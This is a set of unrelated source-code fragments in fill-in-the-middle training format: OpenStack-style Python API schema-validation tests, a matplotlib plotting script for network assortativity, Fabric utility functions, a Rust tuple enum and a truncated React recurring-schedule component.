fakes.HTTPRequest.blank( "/tests?foos=abc&foo=%s&bar=123&_foo_=456" % fakes.FAKE_UUID) req.api_version_request = api_version.APIVersionRequest("2.3") res = self.controller.get(req) res.sort() self.assertEqual(['_foo_', 'foo', 'foos'], res) class RequiredDisableTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'integer', }, }, } def test_validate_required_disable(self): self.assertEqual(self.post(body={'foo': 1}, req=FakeRequest()), 'Validation succeeded.') self.assertEqual(self.post(body={'abc': 1}, req=FakeRequest()), 'Validation succeeded.') class RequiredEnableTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'integer', }, }, 'required': ['foo'] } def test_validate_required_enable(self): self.assertEqual(self.post(body={'foo': 1}, req=FakeRequest()), 'Validation succeeded.') def test_validate_required_enable_fails(self): detail = "'foo' is a required property" self.check_validation_error(self.post, body={'abc': 1}, expected_detail=detail) class AdditionalPropertiesEnableTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'integer', }, }, 'required': ['foo'], } def test_validate_additionalProperties_enable(self): self.assertEqual(self.post(body={'foo': 1}, req=FakeRequest()), 'Validation succeeded.') self.assertEqual(self.post(body={'foo': 1, 'ext': 1}, req=FakeRequest()), 'Validation succeeded.') class AdditionalPropertiesDisableTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'integer', }, }, 'required': ['foo'], 'additionalProperties': False, } def test_validate_additionalProperties_disable(self): self.assertEqual(self.post(body={'foo': 1}, req=FakeRequest()), 'Validation succeeded.') def test_validate_additionalProperties_disable_fails(self): detail = "Additional properties are not allowed ('ext' was unexpected)" self.check_validation_error(self.post, body={'foo': 1, 'ext': 1}, expected_detail=detail) class PatternPropertiesTestCase(APIValidationTestCase): post_schema = { 'patternProperties': { '^[a-zA-Z0-9]{1,10}$': { 'type': 'string' }, }, 'additionalProperties': False, } def test_validate_patternProperties(self): self.assertEqual('Validation succeeded.', self.post(body={'foo': 'bar'}, req=FakeRequest())) def test_validate_patternProperties_fails(self): details = [ "Additional properties are not allowed ('__' was unexpected)", "'__' does not match any of the regexes: '^[a-zA-Z0-9]{1,10}$'" ] self.check_validation_error(self.post, body={'__': 'bar'}, expected_detail=details) details = [ "'' does not match any of the regexes: '^[a-zA-Z0-9]{1,10}$'", "Additional properties are not allowed ('' was unexpected)" ] self.check_validation_error(self.post, body={'': 'bar'}, expected_detail=details) details = [ ("'0123456789a' does not match any of the regexes: " "'^[a-zA-Z0-9]{1,10}$'"), ("Additional properties are not allowed ('0123456789a' was" " unexpected)") ] self.check_validation_error(self.post, body={'0123456789a': 'bar'}, expected_detail=details) # Note(jrosenboom): This is referencing an internal python error # string, which is no stable interface. We need a patch in the # jsonschema library in order to fix this properly. if six.PY3: detail = "expected string or bytes-like object" else: detail = "expected string or buffer" self.check_validation_error(self.post, body={None: 'bar'}, expected_detail=detail) class StringTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'string', }, }, } def test_validate_string(self): self.assertEqual(self.post(body={'foo': 'abc'}, req=FakeRequest()), 'Validation succeeded.') self.assertEqual(self.post(body={'foo': '0'}, req=FakeRequest()), 'Validation succeeded.') self.assertEqual(self.post(body={'foo': ''}, req=FakeRequest()), 'Validation succeeded.') def test_validate_string_fails(self): detail = ("Invalid input for field/attribute foo. Value: 1." " 1 is not of type 'string'") self.check_validation_error(self.post, body={'foo': 1}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 1.5." " 1.5 is not of type 'string'") self.check_validation_error(self.post, body={'foo': 1.5}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: True." " True is not of type 'string'") self.check_validation_error(self.post, body={'foo': True}, expected_detail=detail) class StringLengthTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'string', 'minLength': 1, 'maxLength': 10, }, }, } def test_validate_string_length(self): self.assertEqual(self.post(body={'foo': '0'}, req=FakeRequest()), 'Validation succeeded.') self.assertEqual(self.post(body={'foo': '0123456789'}, req=FakeRequest()), 'Validation succeeded.') def test_validate_string_length_fails(self): detail = ("Invalid input for field/attribute foo. Value: ." " '' is too short") self.check_validation_error(self.post, body={'foo': ''}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 0123456789a." " '0123456789a' is too long") self.check_validation_error(self.post, body={'foo': '0123456789a'}, expected_detail=detail) class IntegerTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': ['integer', 'string'], 'pattern': '^[0-9]+$', }, }, } def test_validate_integer(self): self.assertEqual(self.post(body={'foo': 1}, req=FakeRequest()), 'Validation succeeded.') self.assertEqual(self.post(body={'foo': '1'}, req=FakeRequest()), 'Validation succeeded.') self.assertEqual(self.post(body={'foo': '0123456789'}, req=FakeRequest()), 'Validation succeeded.') def test_validate_integer_fails(self): detail = ("Invalid input for field/attribute foo. Value: abc." " 'abc' does not match '^[0-9]+$'") self.check_validation_error(self.post, body={'foo': 'abc'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: True." " True is not of type 'integer', 'string'") self.check_validation_error(self.post, body={'foo': True}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 0xffff." " '0xffff' does not match '^[0-9]+$'") self.check_validation_error(self.post, body={'foo': '0xffff'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 1.0." " 1.0 is not of type 'integer', 'string'") self.check_validation_error(self.post, body={'foo': 1.0}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 1.0." " '1.0' does not match '^[0-9]+$'") self.check_validation_error(self.post, body={'foo': '1.0'}, expected_detail=detail) class IntegerRangeTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': ['integer', 'string'], 'pattern': '^[0-9]+$', 'minimum': 1, 'maximum': 10, }, }, } def test_validate_integer_range(self): self.assertEqual(self.post(body={'foo': 1}, req=FakeRequest()), 'Validation succeeded.') self.assertEqual(self.post(body={'foo': 10}, req=FakeRequest()), 'Validation succeeded.') self.assertEqual(self.post(body={'foo': '1'}, req=FakeRequest()), 'Validation succeeded.') def test_validate_integer_range_fails(self): detail = ("Invalid input for field/attribute foo. Value: 0." " 0(.0)? is less than the minimum of 1") self.check_validation_error(self.post, body={'foo': 0}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 11." " 11(.0)? is greater than the maximum of 10") self.check_validation_error(self.post, body={'foo': 11}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 0." " 0(.0)? is less than the minimum of 1") self.check_validation_error(self.post, body={'foo': '0'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 11." " 11(.0)? is greater than the maximum of 10") self.check_validation_error(self.post, body={'foo': '11'}, expected_detail=detail) class BooleanTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': parameter_types.boolean, }, } def test_validate_boolean(self): self.assertEqual('Validation succeeded.', self.post(body={'foo': True}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': False}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'True'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'False'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': '1'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': '0'}, req=FakeRequest())) def test_validate_boolean_fails(self): enum_boolean = ("[True, 'True', 'TRUE', 'true', '1', 'ON', 'On'," " 'on', 'YES', 'Yes', 'yes'," " False, 'False', 'FALSE', 'false', '0', 'OFF', 'Off'," " 'off', 'NO', 'No', 'no']") detail = ("Invalid input for field/attribute foo. Value: bar." " 'bar' is not one of %s") % enum_boolean self.check_validation_error(self.post, body={'foo': 'bar'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 2." " '2' is not one of %s") % enum_boolean self.check_validation_error(self.post, body={'foo': '2'}, expected_detail=detail) class HostnameTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': parameter_types.hostname, }, } def test_validate_hostname(self): self.assertEqual('Validation succeeded.', self.post(body={'foo': 'localhost'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'localhost.localdomain.com'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'my-host'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'my_host'}, req=FakeRequest())) def test_validate_hostname_fails(self): detail = ("Invalid input for field/attribute foo. Value: True." " True is not of type 'string'") self.check_validation_error(self.post, body={'foo': True}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 1." " 1 is not of type 'string'") self.check_validation_error(self.post, body={'foo': 1}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: my$host." " 'my$host' does not match '^[a-zA-Z0-9-._]*$'") self.check_validation_error(self.post, body={'foo': 'my$host'}, expected_detail=detail) class HostnameIPaddressTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': parameter_types.hostname_or_ip_address, }, } def test_validate_hostname_or_ip_address(self): self.assertEqual('Validation succeeded.', self.post(body={'foo': 'localhost'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'localhost.localdomain.com'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'my-host'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'my_host'}, req=FakeRequest())) self.assertEqual('Validation succeeded.',<|fim▁hole|> req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': '2001:db8::9abc'}, req=FakeRequest())) def test_validate_hostname_or_ip_address_fails(self): detail = ("Invalid input for field/attribute foo. Value: True." " True is not of type 'string'") self.check_validation_error(self.post, body={'foo': True}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 1." " 1 is not of type 'string'") self.check_validation_error(self.post, body={'foo': 1}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: my$host." " 'my$host' does not match '^[a-zA-Z0-9-_.:]*$'") self.check_validation_error(self.post, body={'foo': 'my$host'}, expected_detail=detail) class NameTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': parameter_types.name, }, } def test_validate_name(self): self.assertEqual('Validation succeeded.', self.post(body={'foo': 'm1.small'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'my server'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'a'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': u'\u0434'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': u'\u0434\u2006\ufffd'}, req=FakeRequest())) def test_validate_name_fails(self): error = ("An invalid 'name' value was provided. The name must be: " "printable characters. " "Can not start or end with whitespace.") should_fail = (' ', ' server', 'server ', u'a\xa0', # trailing unicode space u'\uffff', # non-printable unicode ) for item in should_fail: self.check_validation_error(self.post, body={'foo': item}, expected_detail=error) # four-byte unicode, if supported by this python build try: self.check_validation_error(self.post, body={'foo': u'\U00010000'}, expected_detail=error) except ValueError: pass class NameWithLeadingTrailingSpacesTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': parameter_types.name_with_leading_trailing_spaces, }, } def test_validate_name(self): self.assertEqual('Validation succeeded.', self.post(body={'foo': 'm1.small'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'my server'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'a'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': u'\u0434'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': u'\u0434\u2006\ufffd'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': ' abc '}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': 'abc abc abc'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': ' abc abc abc '}, req=FakeRequest())) # leading unicode space self.assertEqual('Validation succeeded.', self.post(body={'foo': '\xa0abc'}, req=FakeRequest())) def test_validate_name_fails(self): error = ("An invalid 'name' value was provided. The name must be: " "printable characters with at least one non space character") should_fail = ( ' ', u'\xa0', # unicode space u'\uffff', # non-printable unicode ) for item in should_fail: self.check_validation_error(self.post, body={'foo': item}, expected_detail=error) # four-byte unicode, if supported by this python build try: self.check_validation_error(self.post, body={'foo': u'\U00010000'}, expected_detail=error) except ValueError: pass class NoneTypeTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': parameter_types.none } } def test_validate_none(self): self.assertEqual('Validation succeeded.', self.post(body={'foo': 'None'}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': None}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': {}}, req=FakeRequest())) def test_validate_none_fails(self): detail = ("Invalid input for field/attribute foo. Value: ." " '' is not one of ['None', None, {}]") self.check_validation_error(self.post, body={'foo': ''}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: " "{'key': 'val'}. {'key': 'val'} is not one of " "['None', None, {}]") self.check_validation_error(self.post, body={'foo': {'key': 'val'}}, expected_detail=detail) class NameOrNoneTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': parameter_types.name_or_none } } def test_valid(self): self.assertEqual('Validation succeeded.', self.post(body={'foo': None}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': '1'}, req=FakeRequest())) def test_validate_fails(self): detail = ("Invalid input for field/attribute foo. Value: 1234. 1234 " "is not valid under any of the given schemas") self.check_validation_error(self.post, body={'foo': 1234}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: . '' " "is not valid under any of the given schemas") self.check_validation_error(self.post, body={'foo': ''}, expected_detail=detail) too_long_name = 256 * "k" detail = ("Invalid input for field/attribute foo. Value: %s. " "'%s' is not valid under any of the " "given schemas") % (too_long_name, too_long_name) self.check_validation_error(self.post, body={'foo': too_long_name}, expected_detail=detail) class TcpUdpPortTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': parameter_types.tcp_udp_port, }, } def test_validate_tcp_udp_port(self): self.assertEqual('Validation succeeded.', self.post(body={'foo': 1024}, req=FakeRequest())) self.assertEqual('Validation succeeded.', self.post(body={'foo': '1024'}, req=FakeRequest())) def test_validate_tcp_udp_port_fails(self): detail = ("Invalid input for field/attribute foo. Value: True." " True is not of type 'integer', 'string'") self.check_validation_error(self.post, body={'foo': True}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 65536." " 65536(.0)? is greater than the maximum of 65535") self.check_validation_error(self.post, body={'foo': 65536}, expected_detail=detail) class CidrFormatTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'string', 'format': 'cidr', }, }, } def test_validate_cidr(self): self.assertEqual('Validation succeeded.', self.post( body={'foo': '192.168.10.0/24'}, req=FakeRequest() )) def test_validate_cidr_fails(self): detail = ("Invalid input for field/attribute foo." " Value: bar." " 'bar' is not a 'cidr'") self.check_validation_error(self.post, body={'foo': 'bar'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo." " Value: . '' is not a 'cidr'") self.check_validation_error(self.post, body={'foo': ''}, expected_detail=detail) detail = ("Invalid input for field/attribute foo." " Value: 192.168.1.0. '192.168.1.0' is not a 'cidr'") self.check_validation_error(self.post, body={'foo': '192.168.1.0'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo." " Value: 192.168.1.0 /24." " '192.168.1.0 /24' is not a 'cidr'") self.check_validation_error(self.post, body={'foo': '192.168.1.0 /24'}, expected_detail=detail) class DatetimeTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'string', 'format': 'date-time', }, }, } def test_validate_datetime(self): self.assertEqual('Validation succeeded.', self.post( body={'foo': '2014-01-14T01:00:00Z'}, req=FakeRequest() )) def test_validate_datetime_fails(self): detail = ("Invalid input for field/attribute foo." " Value: 2014-13-14T01:00:00Z." " '2014-13-14T01:00:00Z' is not a 'date-time'") self.check_validation_error(self.post, body={'foo': '2014-13-14T01:00:00Z'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo." " Value: bar. 'bar' is not a 'date-time'") self.check_validation_error(self.post, body={'foo': 'bar'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 1." " '1' is not a 'date-time'") self.check_validation_error(self.post, body={'foo': '1'}, expected_detail=detail) class UuidTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'string', 'format': 'uuid', }, }, } def test_validate_uuid(self): self.assertEqual('Validation succeeded.', self.post( body={'foo': '70a599e0-31e7-49b7-b260-868f441e862b'}, req=FakeRequest() )) def test_validate_uuid_fails(self): detail = ("Invalid input for field/attribute foo." " Value: 70a599e031e749b7b260868f441e862." " '70a599e031e749b7b260868f441e862' is not a 'uuid'") self.check_validation_error(self.post, body={'foo': '70a599e031e749b7b260868f441e862'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: 1." " '1' is not a 'uuid'") self.check_validation_error(self.post, body={'foo': '1'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: abc." " 'abc' is not a 'uuid'") self.check_validation_error(self.post, body={'foo': 'abc'}, expected_detail=detail) class UriTestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'string', 'format': 'uri', }, }, } def test_validate_uri(self): self.assertEqual('Validation succeeded.', self.post( body={'foo': 'http://localhost:8774/v2/servers'}, req=FakeRequest() )) self.assertEqual('Validation succeeded.', self.post( body={'foo': 'http://[::1]:8774/v2/servers'}, req=FakeRequest() )) def test_validate_uri_fails(self): base_detail = ("Invalid input for field/attribute foo. Value: {0}. " "'{0}' is not a 'uri'") invalid_uri = 'http://localhost:8774/v2/servers##' self.check_validation_error(self.post, body={'foo': invalid_uri}, expected_detail=base_detail.format( invalid_uri)) invalid_uri = 'http://[fdf8:01]:8774/v2/servers' self.check_validation_error(self.post, body={'foo': invalid_uri}, expected_detail=base_detail.format( invalid_uri)) invalid_uri = '1' self.check_validation_error(self.post, body={'foo': invalid_uri}, expected_detail=base_detail.format( invalid_uri)) invalid_uri = 'abc' self.check_validation_error(self.post, body={'foo': invalid_uri}, expected_detail=base_detail.format( invalid_uri)) class Ipv4TestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'string', 'format': 'ipv4', }, }, } def test_validate_ipv4(self): self.assertEqual('Validation succeeded.', self.post( body={'foo': '192.168.0.100'}, req=FakeRequest() )) def test_validate_ipv4_fails(self): detail = ("Invalid input for field/attribute foo. Value: abc." " 'abc' is not a 'ipv4'") self.check_validation_error(self.post, body={'foo': 'abc'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: localhost." " 'localhost' is not a 'ipv4'") self.check_validation_error(self.post, body={'foo': 'localhost'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo." " Value: 2001:db8::1234:0:0:9abc." " '2001:db8::1234:0:0:9abc' is not a 'ipv4'") self.check_validation_error(self.post, body={'foo': '2001:db8::1234:0:0:9abc'}, expected_detail=detail) class Ipv6TestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'string', 'format': 'ipv6', }, }, } def test_validate_ipv6(self): self.assertEqual('Validation succeeded.', self.post( body={'foo': '2001:db8::1234:0:0:9abc'}, req=FakeRequest() )) def test_validate_ipv6_fails(self): detail = ("Invalid input for field/attribute foo. Value: abc." " 'abc' is not a 'ipv6'") self.check_validation_error(self.post, body={'foo': 'abc'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo. Value: localhost." " 'localhost' is not a 'ipv6'") self.check_validation_error(self.post, body={'foo': 'localhost'}, expected_detail=detail) detail = ("Invalid input for field/attribute foo." " Value: 192.168.0.100. '192.168.0.100' is not a 'ipv6'") self.check_validation_error(self.post, body={'foo': '192.168.0.100'}, expected_detail=detail) class Base64TestCase(APIValidationTestCase): post_schema = { 'type': 'object', 'properties': { 'foo': { 'type': 'string', 'format': 'base64', }, }, } def test_validate_base64(self): self.assertEqual('Validation succeeded.', self.post(body={'foo': 'aGVsbG8gd29ybGQ='}, req=FakeRequest())) # 'aGVsbG8gd29ybGQ=' is the base64 code of 'hello world' def test_validate_base64_fails(self): value = 'A random string' detail = ("Invalid input for field/attribute foo. " "Value: %s. '%s' is not a 'base64'") % (value, value) self.check_validation_error(self.post, body={'foo': value}, expected_detail=detail) class RegexFormatTestCase(APIValidationTestCase): def setUp(self): super(RegexFormatTestCase, self).setUp() self.controller = RegexFormatFakeController() def test_validate_regex(self): req = fakes.HTTPRequest.blank("") self.assertEqual('Validation succeeded.', self.controller.post(req, body={'foo': u'Myserver'})) def test_validate_regex_fails(self): value = 1 req = fakes.HTTPRequest.blank("") detail = ("Invalid input for field/attribute foo. " "Value: %s. %s is not a 'regex'") % (value, value) self.check_validation_error(self.controller.post, req=req, body={'foo': value}, expected_detail=detail)<|fim▁end|>
self.post(body={'foo': '192.168.10.100'},
<|file_name|>plot_degree_assortativity.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # -*- coding: UTF-8 -*- ''' plot the results from the files igraph_degree_assort_study and degree_assortativity ''' from igraph import * import os import numpy as np import matplotlib.pyplot as plt<|fim▁hole|>IN_DIR = '/home/sscepano/Projects7s/Twitter-workspace/ALL_SR' img_out_plot = "7MOda_unweighted.png" ######################### ######################### # read from a file the res ######################### def read_in_res(): f = open('7MODeg_assort_study.weighted_edge_list', 'r') DA = [] TH = [] for line in f: if line.startswith('stats for'): th = float(line.split()[-1]) TH.append(th) if line.startswith('The network is'): da = float(line.split()[-1]) DA.append(da) th_last = th f2 = open('plot_da_0.2.txt', 'r') for line in f2: (th, da) = line.split() th = float(th) if th < th_last: continue da = float(da) TH.append(th) DA.append(da) f3 = open('DA_SR_th.tab', 'w') for i in range(len(TH)): f3.write(str(TH[i]) + '\t' + str(DA[i]) + '\n') return TH, DA def plot_DA(xaxis, da): x = np.array(xaxis) y = np.array(da) plt.plot(x, y, 'c') plt.grid(True) plt.title('SR network') #plt.legend(bbox_to_anchor=(0, 1), bbox_transform=plt.gcf().transFigure) plt.ylabel('degree assortativity') plt.xlabel('SR threshold') plt.savefig(img_out_plot,format='png',dpi=200) def main(): os.chdir(IN_DIR) x, DA = read_in_res() plot_DA(x, DA) main()<|fim▁end|>
#########################
<|file_name|>utils.py<|end_file_name|><|fim▁begin|>""" Internal subroutines for e.g. aborting execution with an error message, or performing indenting on multiline output. """ import sys import textwrap def abort(msg): """ Abort execution, print ``msg`` to stderr and exit with error status (1.) This function currently makes use of `sys.exit`_, which raises `SystemExit`_. Therefore, it's possible to detect and recover from inner calls to `abort` by using ``except SystemExit`` or similar. .. _sys.exit: http://docs.python.org/library/sys.html#sys.exit .. _SystemExit: http://docs.python.org/library/exceptions.html#exceptions.SystemExit """ from fabric.state import output if output.aborts: print >> sys.stderr, "\nFatal error: " + str(msg) print >> sys.stderr, "\nAborting." sys.exit(1) def warn(msg): """ Print warning message, but do not abort execution. This function honors Fabric's :doc:`output controls <../../usage/output_controls>` and will print the given ``msg`` to stderr, provided that the ``warnings`` output level (which is active by default) is turned on. """ from fabric.state import output if output.warnings: print >> sys.stderr, "\nWarning: %s\n" % msg def indent(text, spaces=4, strip=False): """ Return ``text`` indented by the given number of spaces. If text is not a string, it is assumed to be a list of lines and will be joined by ``\\n`` prior to indenting. When ``strip`` is ``True``, a minimum amount of whitespace is removed from the left-hand side of the given string (so that relative indents are preserved, but otherwise things are left-stripped). This allows you to effectively "normalize" any previous indentation for some inputs. """ # Normalize list of strings into a string for dedenting. "list" here means # "not a string" meaning "doesn't have splitlines". Meh. if not hasattr(text, 'splitlines'): text = '\n'.join(text) # Dedent if requested if strip: text = textwrap.dedent(text) prefix = ' ' * spaces output = '\n'.join(prefix + line for line in text.splitlines()) # Strip out empty lines before/aft output = output.strip() # Reintroduce first indent (which just got stripped out) output = prefix + output return output def puts(text, show_prefix=True, end="\n", flush=False): """ An alias for ``print`` whose output is managed by Fabric's output controls. In other words, this function simply prints to ``sys.stdout``, but will hide its output if the ``user`` :doc:`output level </usage/output_controls>` is set to ``False``. If ``show_prefix=False``, `puts` will omit the leading ``[hostname]`` which it tacks on by default. (It will also omit this prefix if ``env.host_string`` is empty.) Newlines may be disabled by setting ``end`` to the empty string (``''``). (This intentionally mirrors Python 3's ``print`` syntax.) You may force output flushing (e.g. to bypass output buffering) by setting ``flush=True``. .. versionadded:: 0.9.2 .. seealso:: `~fabric.utils.fastprint` """ from fabric.state import output, env if output.user: prefix = "" if env.host_string and show_prefix: prefix = "[%s] " % env.host_string sys.stdout.write(prefix + str(text) + end) if flush:<|fim▁hole|> def fastprint(text, show_prefix=False, end="", flush=True): """ Print ``text`` immediately, without any prefix or line ending. This function is simply an alias of `~fabric.utils.puts` with different default argument values, such that the ``text`` is printed without any embellishment and immediately flushed. It is useful for any situation where you wish to print text which might otherwise get buffered by Python's output buffering (such as within a processor intensive ``for`` loop). Since such use cases typically also require a lack of line endings (such as printing a series of dots to signify progress) it also omits the traditional newline by default. .. note:: Since `~fabric.utils.fastprint` calls `~fabric.utils.puts`, it is likewise subject to the ``user`` :doc:`output level </usage/output_controls>`. .. versionadded:: 0.9.2 .. seealso:: `~fabric.utils.puts` """ return puts(text=text, show_prefix=show_prefix, end=end, flush=flush) def handle_prompt_abort(): import fabric.state if fabric.state.env.abort_on_prompts: abort("Needed to prompt, but abort-on-prompts was set to True!")<|fim▁end|>
sys.stdout.flush()
<|file_name|>tup.rs<|end_file_name|><|fim▁begin|>//! A tuple for pattern matching purposes, until vector pattern matching is enabled in stable. //! //! This code is not very pretty at all but it compiles without enabling any experimental features. #[derive(Debug)] pub enum Tup<A,B,C,D,E,F,G,H,I> { T0, T1(A), T2(A, B), T3(A, B, C), T4(A, B, C, D), T5(A, B, C, D, E),<|fim▁hole|> T9(A, B, C, D, E, F, G, H, I), } pub type TupT<T> = Tup<T,T,T,T,T,T,T,T,T>; pub fn vec_to_tup<T: Clone>(vec: &Vec<T>) -> Option<Tup<T,T,T,T,T,T,T,T,T>> { match vec.len() { 0 => Some(Tup::T0), 1 => Some(Tup::T1(vec[0].clone())), 2 => Some(Tup::T2(vec[0].clone(), vec[1].clone())), 3 => Some(Tup::T3(vec[0].clone(), vec[1].clone(), vec[2].clone())), 4 => Some(Tup::T4(vec[0].clone(), vec[1].clone(), vec[2].clone(), vec[3].clone())), 5 => Some(Tup::T5(vec[0].clone(), vec[1].clone(), vec[2].clone(), vec[3].clone(), vec[4].clone())), 6 => Some(Tup::T6(vec[0].clone(), vec[1].clone(), vec[2].clone(), vec[3].clone(), vec[4].clone(), vec[5].clone())), 7 => Some(Tup::T7(vec[0].clone(), vec[1].clone(), vec[2].clone(), vec[3].clone(), vec[4].clone(), vec[5].clone(), vec[6].clone())), 8 => Some(Tup::T8(vec[0].clone(), vec[1].clone(), vec[2].clone(), vec[3].clone(), vec[4].clone(), vec[5].clone(), vec[6].clone(), vec[7].clone())), 9 => Some(Tup::T9(vec[0].clone(), vec[1].clone(), vec[2].clone(), vec[3].clone(), vec[4].clone(), vec[5].clone(), vec[6].clone(), vec[7].clone(), vec[8].clone())), _ => None, } }<|fim▁end|>
T6(A, B, C, D, E, F), T7(A, B, C, D, E, F, G), T8(A, B, C, D, E, F, G, H),
<|file_name|>RecurringSelect.js<|end_file_name|><|fim▁begin|>var React = require('react'); var RulePicker = require('./RulePicker.js'); var TimePicker = require('react-time-picker'); var DatePicker = require('react-date-picker'); var RuleSummary = require("./RuleSummary.js"); var moment = require('moment'); var Tabs = require('react-simpletabs');<|fim▁hole|> var RecurringSelect = React.createClass({displayName: "RecurringSelect", getInitialState: function() { return ({ rule: "daily", interval: 1, validations: null, until: moment().format('YYYY-MM-DD'), startTime: "10:00 AM" }); }, handleRuleChange: function(e) { var rule = e.target.value; var validations = null; if (rule === "weekly") validations = []; if (rule === "monthly (by day of week)") { rule = "monthly"; validations = {1: [], 2: [], 3: [], 4: []}; } if (rule === "monthly (by day of month)") { rule = "monthly"; validations = []; } this.setState({ rule: rule, validations: validations }); }, handleIntervalChange: function(e) { var interval; if (e.target.value != "") { interval = parseInt(e.target.value); } else { interval = 0; } this.setState({ interval: interval }); }, handleValidationsChange: function(validations) { this.setState({ validations: validations }); }, handleEndDateChange: function (date) { this.setState({ until: date }); }, handleTimeChange: function(time) { this.setState({ startTime: time }); }, handleSave: function(e) { var hash = this.state; console.log(hash.validations); var iceCubeHash = {}; var start = moment(hash.startTime, "hh:mm a A"); var minute = start.minute(); var hour = start.hour(); var rule_type; switch (hash.rule) { case 'daily': rule_type = "IceCube::DailyRule"; break; case 'weekly': rule_type = "IceCube::WeeklyRule"; break; case 'monthly': rule_type = "IceCube::MonthlyRule"; break; case 'yearly': rule_type = "IceCube::YearlyRule"; break; } var interval = hash.interval; var validations = hash.validations == null ? {} : hash.validations; var newValidations = {}; if (Array.isArray(validations) && rule_type == "IceCube::WeeklyRule") { newValidations["day"] = validations } else if (Array.isArray(validations) && rule_type == "IceCube::MonthlyRule") { newValidations["day_of_month"] = validations; } else if (rule_type == "IceCube::MonthlyRule") { newValidations["day_of_week"] = validations; } newValidations["hour_of_day"] = hour; newValidations["minute_of_hour"] = minute; var until = hash.until; iceCubeHash["rule_type"] = rule_type; iceCubeHash["interval"] = interval; iceCubeHash["validations"] = 